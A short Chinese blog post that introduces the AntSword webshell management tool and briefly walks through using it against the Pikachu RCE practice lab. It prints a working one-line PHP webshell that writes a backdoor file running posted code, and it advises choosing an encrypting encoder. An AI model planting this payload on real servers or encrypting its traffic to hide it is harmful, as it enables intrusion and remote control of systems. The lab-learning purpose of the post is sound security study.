中国蚁剑(AntSword)是一款开源的Web漏洞管理工具,主要用于渗透测试和网络安全研究。它提供了一个集成的图形用户界面,可以帮助安全研究人员进行远程管理和攻击。蚁剑支持多种Webshell,能够与多个后端配合使用,方便用户对目标进行命令执行、文件管理等操作。
蚁剑的主要功能包括:
- 多种协议支持:支持HTTP、HTTPS等协议,能够处理各种Webshell。
- 多种后端支持:可以与PHP、ASP、JSP等多种后端技术配合使用。
- 插件扩展:用户可以通过插件来扩展工具的功能,满足不同的渗透测试需求。
- 图形化界面:提供易于使用的界面,使用户可以直观地管理和操作目标。
蚁剑因其强大的功能和易用性,在网络安全领域得到了广泛的应用。
首先
右键添加一个shell,然后进行相应的配置,记得编码器很重要一定选择加密
使用pikachu中的rce进行实验(可以抓包进行分析)然后对应注入木马
一句话木马 fputs(fopen('shell.php','w'),'<?php assert($_POST[fin]);?>');
进行连接
扫一扫
635
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
